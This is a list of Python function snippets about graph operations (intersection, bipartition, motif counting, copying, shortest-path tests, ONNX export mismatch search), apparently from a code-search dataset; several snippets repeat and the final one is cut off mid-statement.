"def intersect_igraphs(G1, G2):\n # Ginter = G1.__and__(G2) # This does not work with attributes.\n if G1.ecount() > G2.ecount(): # Iterate through edges of the smaller graph\n G1, G2 = G2, G1\n inter_nodes = set()\n inter_edges = []\n inter_edge_attributes = {}\n inter_node_attributes = {}\n edge_attribute_name_list = G2.edge_attributes()\n node_attribute_name_list = G2.vertex_attributes()\n for edge_attribute_name in edge_attribute_name_list:\n inter_edge_attributes[edge_attribute_name] = []\n for node_attribute_name in node_attribute_name_list:\n inter_node_attributes[node_attribute_name] = []\n for e in list(G1.es):\n n1_id = e.source_vertex[\"id\"]\n n2_id = e.target_vertex[\"id\"]\n try:\n n1_index = G2.vs.find(id = n1_id).index\n n2_index = G2.vs.find(id = n2_id).index\n except ValueError:\n continue\n if G2.are_connected(n1_index, n2_index):\n inter_edges.append((n1_index, n2_index))\n inter_nodes.add(n1_index)\n inter_nodes.add(n2_index)\n edge_attributes = e.attributes()\n for edge_attribute_name in edge_attribute_name_list:\n inter_edge_attributes[edge_attribute_name].append(edge_attributes[edge_attribute_name])\n\n # map nodeids to first len(inter_nodes) integers\n idmap = {n_index:i for n_index,i in zip(inter_nodes, range(len(inter_nodes)))}\n\n G_inter = ig.Graph()\n G_inter.add_vertices(len(inter_nodes))\n G_inter.add_edges([(idmap[e[0]], idmap[e[1]]) for e in inter_edges])\n for edge_attribute_name in edge_attribute_name_list:\n G_inter.es[edge_attribute_name] = inter_edge_attributes[edge_attribute_name]\n\n for n_index in idmap.keys():\n v = G2.vs[n_index]\n node_attributes = v.attributes()\n for node_attribute_name in node_attribute_name_list:\n inter_node_attributes[node_attribute_name].append(node_attributes[node_attribute_name])\n for node_attribute_name in node_attribute_name_list:\n G_inter.vs[node_attribute_name] = inter_node_attributes[node_attribute_name]\n\n return G_inter",
"def haveNoSameEdges(seg1,seg2,segmentsMeta):\n seg1Edges = segmentsMeta['edges'][seg1]\n seg2Edges = segmentsMeta['edges'][seg2]\n return not any(a==b for a in seg1Edges for b in seg2Edges)",
"def get_bipartition(g):\n # Write your code here.\n colorArr = [-1] * (len(g.nodes()) + 1)\n for node in g.nodes():\n start = g.neighbors(node)\n if len(start)>0:\n src = start.pop()\n break\n colorArr[src] = 1\n queue = []\n queue.append(src)\n while (queue):\n u = queue.pop()\n for v in g.nodes():\n if g.has_edge(u, v) and colorArr[v] == -1:\n colorArr[v] = 1 - colorArr[u]\n queue.append(v)\n elif g.has_edge(u, v) and colorArr[u] == colorArr[v]:\n return None\n\n red = set()\n for i in range(1, len(colorArr)):\n if colorArr[i] == 1:\n red.add(i)\n return list(red)\n\n\n\n # Hint! If you'd like to test out these commands without\n # writing a full-fledged program, you might want to familiarise\n # yourself with the Python interactive shell or IPython (available\n # on at least some Aalto IT computers)\n\n # Create a simple line graph g: \"(1)->(2)->(3)\"\n # (The creation parameter is a dict of {node: list_of_neighbors},\n # but this is not something you will be needing in your code.)\n # >>> from networkx import Graph \n # >>> g = Graph({1: [2], 2: [3]})\n # >>> g.number_of_nodes()\n # 3\n\n # Example. Iterate over the nodes and mark them as visited\n # >>> visited = set()\n # >>> for node in g.nodes_iter(): # There is also g.nodes(), which returns a list\n # ... # do some work here\n # ... visited.add(node)\n \n # Example. Given a Node v, get all nodes s.t. there is an edge between\n # v and that node\n # >>> g.neighbors(1)\n # [2]\n\n # Example. Get the edges of the graph:\n # >>> e.edges() # as with nodes, there is also g.edges_iter()\n # [(1, 2), (2, 3)]\n\n # For more information, consult the NetworkX documentation:\n # https://networkx.github.io/documentation/networkx-1.10/tutorial/tutorial.html",
"def find_structure(self):\n cave_graphs = []\n starting_point = None\n # firse initalize points\n for point in self.points.values():\n neighbors = self.get_neighbors(point)\n if len(neighbors) != 2 and point.node is None:\n starting_point = point\n print 'Found graph!'\n cave_graphs.append(self.follow_graph(starting_point))\n \n if starting_point is None:\n raise Exception(\"Couldn't detect any junction in the thinned map.\")\n \n return cave_graphs",
"def _split_seen_unseen_new(dfs, name_train, name_test):\n\n def _table_is_composed_of(composed_table, tables):\n return set(composed_table.name.split()).intersection(tables)\n\n seen = [t for t in dfs if not _table_is_composed_of(t, name_test)]\n new = [t for t in dfs if not _table_is_composed_of(t, name_train)]\n unseen = [t for t in dfs if _table_is_composed_of(t, name_test) and _table_is_composed_of(t, name_train)]\n return seen, unseen, new",
"def connect_all(graph, nodeset):\n for element in nodeset:\n graph.add_node(element)\n for element1 in nodeset:\n for element2 in nodeset:\n if not element1 == element2:\n graph.add_edge(element1, element2)\n return graph",
"def detect_splits(self):\n logg.info(' abstracted graph will have {} nodes'.format(self.n_splits+1))\n indices_all = np.arange(self.X.shape[0], dtype=int)\n segs = [indices_all]\n if False: # this is safe, but not compatible with on-the-fly computation\n tips_all = np.array(np.unravel_index(np.argmax(self.Dchosen), self.Dchosen.shape))\n else:\n if self.iroot is not None:\n tip_0 = np.argmax(self.Dchosen[self.iroot])\n else:\n tip_0 = np.argmax(self.Dchosen[0]) # just a random index, here fixed to \"0\"\n tips_all = np.array([tip_0, np.argmax(self.Dchosen[tip_0])])\n # we keep a list of the tips of each segment\n segs_tips = [tips_all]\n if self.clusters_precomputed_names:\n self.segs_names_original = [', '.join(self.clusters_precomputed_names)]\n segs_undecided = [True]\n segs_adjacency = [[]]\n segs_distances = np.zeros((1, 1))\n segs_adjacency_nodes = [{}]\n # logg.info(' do not consider groups with less than {} points for splitting'\n # .format(self.min_group_size))\n for ibranch in range(self.n_splits):\n if self.clusters == 'unconstrained_segments':\n iseg, new_tips = self.select_segment(segs, segs_tips, segs_undecided)\n if iseg == -1:\n logg.info('... partitioning converged')\n break\n logg.info('... branching {}:'.format(ibranch + 1),\n 'split group', iseg)\n segs_distances = self.do_split(segs, segs_tips,\n segs_undecided,\n segs_adjacency,\n segs_distances,\n iseg, new_tips)\n else:\n logg.msg(' split', ibranch + 1, v=4)\n stop, segs_distances = self.do_split_constrained(segs, segs_tips,\n segs_adjacency,\n segs_adjacency_nodes,\n segs_distances)\n if stop: break\n\n # segments\n self.segs = segs\n self.segs_tips = segs_tips\n self.segs_sizes = []\n for iseg, seg in enumerate(self.segs): self.segs_sizes.append(len(seg))\n\n # the full, unscaled adjacency matrix\n self.segs_adjacency_full_attachedness = 1/segs_distances\n # if self.attachedness_measure == 'connectedness':\n # norm = np.sqrt(np.multiply.outer(self.segs_sizes, self.segs_sizes))\n # self.segs_adjacency_full_attachedness /= norm\n self.segs_adjacency_full_confidence, self.segs_adjacency_tree_confidence \\\n = self.compute_adjacency_confidence(\n self.segs_adjacency_full_attachedness,\n segs_adjacency,\n self.tree_based_confidence)\n np.fill_diagonal(self.segs_adjacency_full_attachedness, 0)",
"def merge(self, g1, g2):\n logger = logging.getLogger(__name__)\n \n \n g = BaseGraph()\n g.copy_graph_from(g1)\n\n plwn2sumo_dict = defaultdict(set)\n plwn2sumo_dict = self.get_plwn2sumo_dict()\n\n synset_on_vertex_dict = {}\n for node in g.all_nodes():\n synset_id = node.synset.synset_id\n if synset_id in synset_on_vertex_dict:\n logger.warning(\"ID of some synset is not unique.\")\n continue\n synset_on_vertex_dict[synset_id] = node\n\n num_of_edge = 0\n for edge in g2.all_edges():\n num_of_edge += 1\n logger.info(\"%d/%d\", num_of_edge, g2.num_edges())\n\n parent_sumo_concept = edge.source().sumo\n child_sumo_concept = edge.target().sumo\n\n if parent_sumo_concept not in plwn2sumo_dict:\n logger.warning(\"The mapping file doesn't contain sumo concept '%s'.\", parent_sumo_concept)\n continue\n if child_sumo_concept not in plwn2sumo_dict:\n logger.warning(\"The mapping file doesn't contain sumo concept '%s'.\", child_sumo_concept)\n continue\n\n for parent_syn_id in plwn2sumo_dict[parent_sumo_concept]:\n if parent_syn_id not in synset_on_vertex_dict:\n logger.warning(\"The mapping file contains synset '%d' that is not in the graph.\", parent_syn_id)\n continue\n p_node = synset_on_vertex_dict[parent_syn_id]\n for child_syn_id in plwn2sumo_dict[child_sumo_concept]:\n if child_syn_id not in synset_on_vertex_dict:\n logger.warning(\"The mapping file contains synset '%d' that is not in the graph.\", child_syn_id)\n continue\n ch_node = synset_on_vertex_dict[child_syn_id]\n \n g.add_edge(p_node,\n ch_node,\n [(\"rel\", edge.rel)],\n simply=True)\n \n\n return g",
"def check_Motifs(H, m):\n\t#This function will take each possible subgraphs of gr of size 3, then\n\t#compare them to the mo dict using .subgraph() and is_isomorphic\n\t\n\t#This line simply creates a dictionary with 0 for all values, and the\n\t#motif names as keys\n\n\t##paper source \"Higher-order organization ofcomplex networks\" (2016) Benson et al, Science\n\t## I choose only the unidirection ones : M1, M5, M8, M9, M10\n\n\n\ts = int(m)\n\n\tif (s==3):\n\t\t#motifs = {'M1': nx.DiGraph([(1,2),(2,3),(3,1)]), 'M5': nx.DiGraph([(1,2),(2,3),(1,3)]), 'M8': nx.DiGraph([(2, 1),(2,3)]), 'M9': nx.DiGraph([(2, 1),(3, 2)]), 'M10': nx.DiGraph([(1,2),(3,2)])}\n\t\tmotifs = {'M1': [(1,2),(2,3),(3,1)], 'M5': [(1,2),(2,3),(1,3)], 'M8': [(2, 1),(2,3)], 'M9': [(2, 1),(3, 2)], 'M10': [(1,2),(3,2)],\n\t\t\t\t\t'M2': [(1,2),(2,3),(3,2),(3,1)], 'M3': [(1,2),(2,3),(3,2),(1,3),(3,1)], 'M4': [(1,2),(2,1),(2,3),(3,2),(1,3),(3,1)], 'M6': [(2, 1),(2,3),(1,3),(3,1)], 'M7': [(1,2),(3,2),(1,3),(3,1)],\n\t\t\t\t\t'M11': [(1,2),(2,1),(2,3)], 'M12': [(1,2),(2,1),(3,2)], 'M13': [(1,2),(2,1),(2,3),(3,2)]}\n\n\telif (s==4): ## under development\n\t\tmotifs = {'bifan': [(1,2),(1,3),(4,2),(4,3)]}\n\n\t\t#edgeLists=[[[1,2],[1,3],[1,4]]]\n\t\t#edgeLists.append([[1,2],[1,3],[1,4],[2,3]])\n\t\t#edgeLists.append([[1,2],[1,3],[1,4],[2,3],[3,4]])\n\t\t#edgeLists.append([[1,2],[1,3],[1,4],[2,3],[3,4],[2,4]])\n\telse:\n\t\traise nx.NetworkXNotImplemented('Size of motif must be 3 or 4')\n\n\t#outf = open(f2, 'w')\n\t#print >> outf, 'commitid|motiflabel|count'\n\n\tG = H\n\n\tmcount = dict(zip(motifs.keys(), list(map(int, np.zeros(len(motifs))))))\n\n\t## match the pattern and count the motifs \n\tdict_edges = defaultdict(list); dict_nodes = defaultdict(list)\n\tfor key in motifs :\n\t\n\t\t\tpattern = motifs[key]\n\t\t\n\t\t\tgmoti = nx.DiGraph()\n\t\t\tgmoti.add_edges_from(pattern)\n\n\t\t\tmotif_pattern_obs = subgraph_pattern(G, gmoti, sign_sensitive=False)\n\n\t\t\ts = []\n\t\t\tfor subgraph in motif_pattern_obs :\n\t\t\t\ttup = tuple(subgraph.keys())\n\t\t\t\ts.append(tup)\n\n\t\t\tuniqs = list(set(s))\n\n\t\t\tif len(uniqs) > 0 :\n\t\t\t\tmaplist = map(list, uniqs)\n\n\t\t\t### label the edges as per the motif labels\n\t\t\t\tmcount[str(key)] = len(maplist)\n\n\t\t\t\tfor triplets in maplist :\n\t\t\t\t\tsubgraph = G.subgraph(triplets)\n\t\t\t\t\tedgeLists = [e for e in subgraph.edges() if G.has_edge(*e)]\n\n\t\t\t\t## an edge is part of multiple motifs\n\t\t\t\t## lets count the number of motifs an edge is part of \n\t\t\t\t\tfor u, v in edgeLists :\n\t\t\t\t\t\tdict_edges[(u, v)].append(str(key))\n\t\n\n\t\t\t\t## A node is also part of multiple motifs. \n\t\t\t\t## We count the total number of motifs a node is part of\n\t\t\t\t## We count the frequency of occurence each motif the node is part of\n\t\t\t\t\tnodelists = subgraph.nodes()\n\t\t\t\t\tfor n in nodelists :\n\t\t\t\t\t\tdict_nodes[str(n)].append(str(key))\n\n\n\n\t\t#for keys, values in mcount.items() :\n\t\t#\tprint >> outf, '%s|%s|%s' %(outname, keys, values) \n\n\t### Let's mark the edge with motif type and count. We count the number of types\n\t### of motif an edge is a part of. An edge could appear in M1: M1x times and in M2: M2x times and so on\n\n\tfor u,v in G.edges() :\n\t\t\tif (u,v) in dict_edges :\n\t\t\t\tG[u][v]['num_motif_edge'] = len(list(set(dict_edges[(u,v)])))\n\n\t### Let's mark the node with motif type and count. We count the number of types of motif a node is a part of. \n\n\tfor n in G.nodes() :\n\t\tmotficountnode = dict(zip(motifs.keys(), list(map(int, np.zeros(len(motifs))))))\n\n\t\tif str(n) in dict_nodes :\n\t\t\tsubgraphnodeslist = dict_nodes[str(n)]\n\n\t\t\tfor key in subgraphnodeslist:\n\t\t\t\tmotficountnode[str(key)] +=1\n\n\t\tfor motif, count in motficountnode.items() :\n\t\t\tG.node[n][str(motif)] = int(count)\n\n\t### Let's mark the edge with motif type and count. We count the number of types\n\t### of motif an edge is a part of. An edge could appear in M1: M1x times and in M2: M2x times and so on\n\n\tfor u,v in G.edges() :\n\t\tmotficountedge = dict(zip(motifs.keys(), list(map(int, np.zeros(len(motifs))))))\n\n\t\tif (u,v) in dict_edges :\n\t\t\tsubgraphedgeslist = dict_edges[(u,v)]\n\n\t\t\tfor key in subgraphedgeslist:\n\t\t\t\tmotficountedge[str(key)] +=1\n\n\t\tfor motif, count in motficountedge.items() :\n\t\t\tG[u][v][str(motif)] = int(count)\n\n\n\treturn G",
"def GraphBetter(metric_set1_sorted, metric_set2_sorted, base_is_set_2):\n total_bitrate_difference_ratio = 0.0\n count = 0\n for bitrate, metric in metric_set1_sorted:\n for i in range(len(metric_set2_sorted) - 1):\n s2_bitrate_0, s2_metric_0 = metric_set2_sorted[i]\n s2_bitrate_1, s2_metric_1 = metric_set2_sorted[i + 1]\n # We have a point on either side of our metric range.\n if metric > s2_metric_0 and metric <= s2_metric_1:\n\n # Calculate a slope.\n if s2_metric_1 - s2_metric_0 != 0:\n metric_slope = ((s2_bitrate_1 - s2_bitrate_0) /\n (s2_metric_1 - s2_metric_0))\n else:\n metric_slope = 0\n\n estimated_s2_bitrate = (s2_bitrate_0 + (metric - s2_metric_0) *\n metric_slope)\n\n # Calculate percentage difference as given by base.\n if base_is_set_2 == 0:\n bitrate_difference_ratio = ((bitrate - estimated_s2_bitrate) /\n bitrate)\n else:\n bitrate_difference_ratio = ((bitrate - estimated_s2_bitrate) /\n estimated_s2_bitrate)\n\n total_bitrate_difference_ratio += bitrate_difference_ratio\n count += 1\n break\n\n # Calculate the average improvement between graphs.\n if count != 0:\n avg = total_bitrate_difference_ratio / count\n\n else:\n avg = 0.0\n\n return avg",
"def copy_graph(graph):\r\n new_graph = {}\r\n for node in graph:\r\n new_graph[node] = set(graph[node])\r\n return new_graph",
"def copy_graph(graph):\r\n new_graph = {}\r\n for node in graph:\r\n new_graph[node] = set(graph[node])\r\n return new_graph",
"def all_mismatch_leaf_graph_info(self) -> List[\"GraphInfo\"]:\n if not self.has_mismatch():\n return []\n\n no_mismatch_children = (\n self.upper_graph_info is None or not self.upper_graph_info.has_mismatch()\n ) and (\n self.lower_graph_info is None or not self.lower_graph_info.has_mismatch()\n )\n\n if no_mismatch_children:\n return [self]\n\n results = []\n if self.upper_graph_info is not None:\n results += self.upper_graph_info.all_mismatch_leaf_graph_info()\n if self.lower_graph_info is not None:\n results += self.lower_graph_info.all_mismatch_leaf_graph_info()\n\n return results",
"def __filterEdges(self):",
"def aga_compare_paths(adata1, adata2,\n adjacency_key='aga_adjacency_full_confidence'):\n import networkx as nx\n g1 = nx.Graph(adata1.add[adjacency_key])\n g2 = nx.Graph(adata2.add[adjacency_key])\n leaf_nodes1 = [str(x) for x in g1.nodes() if g1.degree(x) == 1]\n logg.msg('leaf nodes in graph 1: {}'.format(leaf_nodes1), v=5, no_indent=True)\n asso_groups1 = utils.identify_groups(adata1.smp['aga_groups'], adata2.smp['aga_groups'])\n asso_groups2 = utils.identify_groups(adata2.smp['aga_groups'], adata1.smp['aga_groups'])\n orig_names1 = adata1.add['aga_groups_order_original']\n orig_names2 = adata2.add['aga_groups_order_original']\n\n import itertools\n n_steps = 0\n n_agreeing_steps = 0\n n_paths = 0\n n_agreeing_paths = 0\n # loop over all pairs of leaf nodes in the reference adata1\n for (r, s) in itertools.combinations(leaf_nodes1, r=2):\n r2, s2 = asso_groups1[r][0], asso_groups1[s][0]\n orig_names = [orig_names1[int(i)] for i in [r, s]]\n orig_names += [orig_names2[int(i)] for i in [r2, s2]]\n logg.msg('compare shortest paths between leafs ({}, {}) in graph1 and ({}, {}) in graph2:'\n .format(*orig_names), v=4, no_indent=True)\n no_path1 = False\n try:\n path1 = [str(x) for x in nx.shortest_path(g1, int(r), int(s))]\n except nx.NetworkXNoPath:\n no_path1 = True\n no_path2 = False\n try:\n path2 = [str(x) for x in nx.shortest_path(g2, int(r2), int(s2))]\n except nx.NetworkXNoPath:\n no_path2 = True\n if no_path1 and no_path2:\n # consistent behavior\n n_paths += 1\n n_agreeing_paths += 1\n n_steps += 1\n n_agreeing_steps += 1\n continue\n elif no_path1 or no_path2:\n # non-consistent result\n n_paths += 1\n n_steps += 1\n continue\n if len(path1) >= len(path2):\n path_mapped = [asso_groups1[l] for l in path1]\n path_compare = path2\n path_compare_id = 2\n path_compare_orig_names = [[orig_names2[int(s)] for s in l] for l in path_compare]\n path_mapped_orig_names = [[orig_names2[int(s)] for s in l] for l in path_mapped]\n else:\n path_mapped = [asso_groups2[l] for l in path2]\n path_compare = path1\n path_compare_id = 1\n path_compare_orig_names = [[orig_names1[int(s)] for s in l] for l in path_compare]\n path_mapped_orig_names = [[orig_names1[int(s)] for s in l] for l in path_mapped]\n n_agreeing_steps_path = 0\n ip_progress = 0\n for il, l in enumerate(path_compare[:-1]):\n for ip, p in enumerate(path_mapped):\n if ip >= ip_progress and l in p:\n # check whether we can find the step forward of path_compare in path_mapped\n if (ip + 1 < len(path_mapped)\n and\n path_compare[il + 1] in path_mapped[ip + 1]):\n # make sure that a step backward leads us to the same value of l\n # in case we \"jumped\"\n logg.msg('found matching step ({} -> {}) at position {} in path{} and position {} in path_mapped'\n .format(l, path_compare_orig_names[il + 1], il, path_compare_id, ip), v=6)\n consistent_history = True\n for iip in range(ip, ip_progress, -1):\n if l not in path_mapped[iip - 1]:\n consistent_history = False\n if consistent_history:\n # here, we take one step further back (ip_progress - 1); it's implied that this\n # was ok in the previous step\n logg.msg(' step(s) backward to position(s) {} in path_mapped are fine, too: valid step'\n .format(list(range(ip - 1, ip_progress - 2, -1))), v=6)\n n_agreeing_steps_path += 1\n ip_progress = ip + 1\n break\n n_steps_path = len(path_compare) - 1\n n_agreeing_steps += n_agreeing_steps_path\n n_steps += n_steps_path\n n_paths += 1\n if n_agreeing_steps_path == n_steps_path: n_agreeing_paths += 1\n\n # only for the output, use original names\n path1_orig_names = [orig_names1[int(s)] for s in path1]\n path2_orig_names = [orig_names2[int(s)] for s in path2]\n logg.msg(' path1 = {},\\n'\n 'path_mapped = {},\\n'\n ' path2 = {},\\n'\n '-> n_agreeing_steps = {} / n_steps = {}.'\n .format(path1_orig_names,\n [list(p) for p in path_mapped_orig_names],\n path2_orig_names,\n n_agreeing_steps_path, n_steps_path), v=5, no_indent=True)\n Result = namedtuple('aga_compare_paths_result',\n ['frac_steps', 'n_steps', 'frac_paths', 'n_paths'])\n return Result(frac_steps=n_agreeing_steps/n_steps if n_steps > 0 else np.nan,\n n_steps=n_steps if n_steps > 0 else np.nan,\n frac_paths=n_agreeing_paths/n_paths if n_steps > 0 else np.nan,\n n_paths=n_paths if n_steps > 0 else np.nan)",
"def find_mismatch(\n self,\n options: Optional[VerificationOptions] = None,\n ):\n self.clear()\n\n if options is None:\n options = VerificationOptions()\n\n if self.export_options.verbose:\n print(self.graph)\n\n if len(list(self.graph.outputs())) == 0:\n return\n\n assert len(self.input_args) + len(self.params_dict) == len(\n list(self.graph.inputs())\n ), (\n f\"Number of graph inputs({len(list(self.graph.inputs()))}) does not match \"\n f\"the provided tensor arguments({len(self.input_args)} + {len(self.params_dict)}).\"\n )\n\n self.mismatch_error, self._onnx_graph, self.pt_outs, _ = self.verify_export(\n options\n )\n\n if self.mismatch_error is None:\n # No mismatch found in graph.\n return\n\n if self.essential_node_count() <= 1:\n # Reached leaf node, no more partitioning.\n return\n\n full_kwargs = {\n k.debugName(): v for k, v in zip(self.graph.inputs(), self.input_args)\n }\n full_params = self.params_dict\n\n upper_graph = self._partition_upper_graph()\n upper_args, upper_params = self._args_and_params_for_partition_graph(\n upper_graph, {}, full_kwargs, full_params\n )\n self.upper_graph_info = GraphInfo(\n upper_graph,\n upper_args,\n upper_params,\n self.export_options,\n id=self.id + \"0\",\n )\n\n self.upper_graph_info.find_mismatch(options)\n\n bridge_kwargs = self.upper_graph_info._bridge_kwargs()\n lower_graph = self._partition_lower_graph()\n lower_args, lower_params = self._args_and_params_for_partition_graph(\n lower_graph, bridge_kwargs, full_kwargs, full_params\n )\n self.lower_graph_info = GraphInfo(\n lower_graph,\n lower_args,\n lower_params,\n self.export_options,\n id=self.id + \"1\",\n )\n\n self.lower_graph_info.find_mismatch(options)",
"def _build_graph2(self, g1):\n g2 = g1.copy()\n for source, target, weight in self._remaining_edges:\n if weight == -1:\n self._gt_edges.append((source, target))\n if g2.has_edge(source, target):\n g2.remove_edge(source, target)\n return g2",
"def sub_graph_merging(self):\n raise NotImplementedError()",
"def test_unique_graph(self):\n g0_graph = tf.Graph()\n with g0_graph.as_default():\n tf.constant(1, name=\"a\")\n tf.constant(2, name=\"b\")\n g1_graph = tf.Graph()\n with g1_graph.as_default():\n tf.constant(1, name=\"a\")\n tf.constant(2, name=\"b\")\n\n g0 = gde.Graph(g0_graph.as_graph_def())\n g1 = gde.Graph(g1_graph.as_graph_def())\n a0, b0, a1, b1 = (g0[\"a\"], g0[\"b\"], g1[\"a\"], g1[\"b\"])\n\n print(\"g0['a'] returns {} (type {})\".format(g0['a'], type(g0['a'])))\n\n # Same graph, should be fine.\n self.assertIsNone(gde.util.check_graphs(a0, b0))\n # Two different graphs, should assert.\n with self.assertRaises(ValueError):\n gde.util.check_graphs(a0, b0, a1, b1)\n # a0 and b0 belongs to the same graph, should be fine.\n self.assertEqual(gde.util.get_unique_graph([a0, b0]), g0)\n # Different graph, should raise an error.\n with self.assertRaises(ValueError):\n gde.util.get_unique_graph([a0, b0, a1, b1])",
"def group_adjacents(group, board, filter_by=None):\n liberties = set([])\n for location in group:\n if filter_by == \"None\":\n liberties |= xy_adjacents(location, board, filter_by=\"None\")\n elif filter_by == \"friend\":\n liberties |= xy_adjacents(location, board, filter_by=\"friend\")\n elif filter_by == \"foe\":\n liberties |= xy_adjacents(location, board, filter_by=\"foe\")\n else:\n liberties |= xy_adjacents(location, board)\n liberties -= group\n return liberties",
"def split_into_components(X_df, G):\n components = list(networkx.components.connected_components(G))\n\n X_splits = [X_df.filter(items=component) for component in components]\n subgraphs = [G.subgraph(component) for component in components]\n return X_splits, subgraphs",
"def test_large_mostly_linear_graph_to_check_multiple_paths(self):\n self.assertEquals(\n Dijkstras().dijkstras(self.g8, 'a', 'b'),\n (5, ['a', 'c', 'd', 'b']))",
"def similar(g1, g2):\r\n return all(t1 == t2 for (t1, t2) in _squashed_graphs_triples(g1, g2))",
"def segmentGraph(self, edges):\r\n\r\n sorted_edges = sorted(edges)\r\n\r\n for i in range(self._num_edges):\r\n a = self._operation.find(sorted_edges[i][1])\r\n b = self._operation.find(sorted_edges[i][2])\r\n if a != b:\r\n if sorted_edges[i][0] <= self._thresh[a] and sorted_edges[i][0] <= self._thresh[b]:\r\n self._operation.join(a, b)\r\n a = self._operation.find(a)\r\n self._thresh[a] = sorted_edges[i][0] + self.threshold_fn(self._operation.size(a))\r\n\r\n for i in range(self._num_edges):\r\n a = self._operation.find(sorted_edges[i][1])\r\n b = self._operation.find(sorted_edges[i][2])\r\n\r\n if a != b and (self._operation.size(a) < self._minSize or self._operation.size(b) < self._minSize):\r\n self._operation.join(a, b)\r\n\r\n # num = self._operation.num_sets()\r\n # print(num)\r\n\r\n colors = []\r\n for i in range(self._num_vertices):\r\n b = np.random.randint(0, 256)\r\n g = np.random.randint(0, 256)\r\n r = np.random.randint(0, 256)\r\n colors.append([b, r, g])\r\n\r\n dim = self._image.shape\r\n dst = self._image.copy()\r\n\r\n for y in range(dim[0]):\r\n for x in range(dim[1]):\r\n temp = self._operation.find(y * dim[1] + x)\r\n dst[y, x] = colors[temp]\r\n\r\n plt.figure(2)\r\n plt.imshow(dst)\r\n plt.show()",
"def compress_graphs(graphs):\n \n verts = graphs.shape[1]\n graphs_comp = graphs.T[np.triu_indices(verts, 1)].T\n \n return graphs_comp",
"def containers(self):\n seen = set()\n return [l.from_segment for l in self.edges_to_containers \\\n if id(l) not in seen and not seen.add(id(l))]",
"def duplicate(self):\r\n graph = DistanceGraph(self.size)\r\n for node in self.edges:\r\n for edge in self.edges[node]:\r\n graph.edges[node][edge] = self.edges[node][edge]\r\n return graph",
"def copy_graph(graph):\n new_graph = {}\n for node in graph:\n new_graph[node] = set(graph[node])\n return new_graph",
"def copy_graph(graph):\n new_graph = {}\n for node in graph:\n new_graph[node] = set(graph[node])\n return new_graph",
"def copy_graph(graph):\n new_graph = {}\n for node in graph:\n new_graph[node] = set(graph[node])\n return new_graph",
"def copy_graph(graph):\n new_graph = {}\n for node in graph:\n new_graph[node] = set(graph[node])\n return new_graph",
"def copy_graph(graph):\n new_graph = {}\n for node in graph:\n new_graph[node] = set(graph[node])\n return new_graph",
"def getSubGraphs(self):\n\n self.subGraphs = []\n visited = {}\n queue = deque()\n\n for s in self.nodes:\n\n if s not in visited:\n subGraph = SubGraph()\n self.subGraphs.append(subGraph)\n else:\n continue\n\n queue.append(s)\n\n while len (queue) > 0:\n outDegree = 0\n node = queue.popleft()\n if node in visited:\n continue\n\n for u in node.adj:\n if u not in visited:\n outDegree += 1\n queue.append(u)\n\n\n subGraph.addNode(node, outDegree)\n visited[node] = True",
"def test_random_node_disconnected_graphs(self):\n self.assertEquals(\n Dijkstras().dijkstras(self.g7, 'a', 'b'),\n (3, ['a', 'c', 'b']))",
"def compact_graph(f_segment_info, f_transition_info, f_each_segment_length, f_cut_index\\\r\n , b_segment_info, b_transition_info, b_each_segment_length, b_cut_index):\r\n hg = Graph(len(f_segment_info)+len(b_segment_info), len(f_transition_info)+len(b_transition_info))\r\n\r\n b_segment_info.reverse()\r\n b_current_segment_index = 0\r\n for s1 in b_segment_info:\r\n current_segment = Segment(b_current_segment_index,\\\r\n b_cut_index[b_current_segment_index]+1-b_each_segment_length[b_current_segment_index]\\\r\n , b_each_segment_length[b_current_segment_index], 0)\r\n current_segment.add_haplotype(b_segment_info[b_current_segment_index])\r\n hg.add_segment(current_segment)\r\n b_current_segment_index += 1\r\n\r\n f_current_segment_index = 0\r\n for s2 in f_segment_info:\r\n current_segment = Segment(f_current_segment_index+b_current_segment_index, f_cut_index[f_current_segment_index]\\\r\n , f_each_segment_length[f_current_segment_index], 1)\r\n current_segment.add_haplotype(f_segment_info[f_current_segment_index])\r\n hg.add_segment(current_segment)\r\n f_current_segment_index += 1\r\n\r\n b_transition_info.reverse()\r\n b_current_transition_index = 0\r\n for t1 in b_transition_info:\r\n current_transition = Transition(b_current_transition_index, b_cut_index[b_current_transition_index]+1, 0)\r\n current_transition.add_transition(b_transition_info[b_current_transition_index])\r\n hg.add_transition(current_transition)\r\n b_current_transition_index += 1\r\n\r\n f_current_transition_index = 0\r\n for t2 in f_transition_info:\r\n current_transition = Transition(f_current_transition_index+b_current_transition_index,\\\r\n f_cut_index[f_current_transition_index + 1], 1)\r\n current_transition.add_transition(f_transition_info[f_current_transition_index])\r\n hg.add_transition(current_transition)\r\n f_current_transition_index += 1\r\n\r\n return hg",
"def reduce_graph(G: Graph) -> Tuple[Graph, Graph]:\n G1 = Graph(G.V, set())\n G2 = Graph(G.V, set())\n # Note that the paper says |V1| != |V|, but it is likely a typo, and it meant\n # either \"until\" or \"while |V1| == |V|\"\n # After all, just looking at Figure 9 it is visible that the number of vertex\n # on G1 is not the number of vertex on the original graph\n while len(G1.V) == len(G.V):\n e = np.random.choice(list(G.E))\n S = generate_clique_candidate(G, e)\n G1 = induced_subgraph(G, S)\n G2.E = G.E.difference({e})\n return G1, G2",
"def get_locations(nodes, tl, br):\n \n # Base cases:\n if len(nodes) == 1: # for singleton, only choice is to place in the single spot in 1x1 square\n return {nodes[0]: tl}\n if len(nodes) == 2: # for two nodes, arbitrarily chose to place the first node in top left\n return {nodes[0]: tl, nodes[1]: br}\n\n # Recursive case, need to create and solve subproblems:\n ret = {}\n\n num_edges = count_num_edges(nodes)\n if num_edges == 0: # for empty graphs, no need to run METIS, just assign arbitrarily\n i = 0\n for x in range(tl.x, br.x+1): \n for y in range(tl.y, br.y+1):\n if i < len(nodes):\n ret.update({nodes[i]: Point(x,y)})\n i += 1\n return ret\n\n filename = splitext(basename(sys.argv[1]))[0] + '.p.' + sys.argv[2] + '.yx.' + sys.argv[3] + '.drop.' + sys.argv[4] + '.' +\\\n '_'.join(['delete', str(tl.x), str(tl.y), str(br.x), str(br.y)]) \n\n # special case for the very first call of get_locations. For example, suppose that there are\n # 97 nodes on a 10x10 grid. Instead of dividing the 97 nodes into 2 equal partitions, we should\n # divide them into a partition of 90 nodes and a partition of 7 nodes. The former should be\n # placed on a 10x9 grid and te latter should be placed on a 1x7 grid.\n if len(nodes) < (br.x - tl.x + 1) * (br.y - tl.y + 1):\n assert tl == Point(0, 0)\n size_tl_nodes = (br.x + 1) * int(len(nodes) / (br.x + 1))\n if size_tl_nodes == len(nodes):\n ret.update(get_locations(nodes, tl=Point(0, 0), br=Point(br.x, len(nodes) / (br.x + 1) - 1)))\n return ret\n\n nodes_tl, nodes_br = partition(nodes, 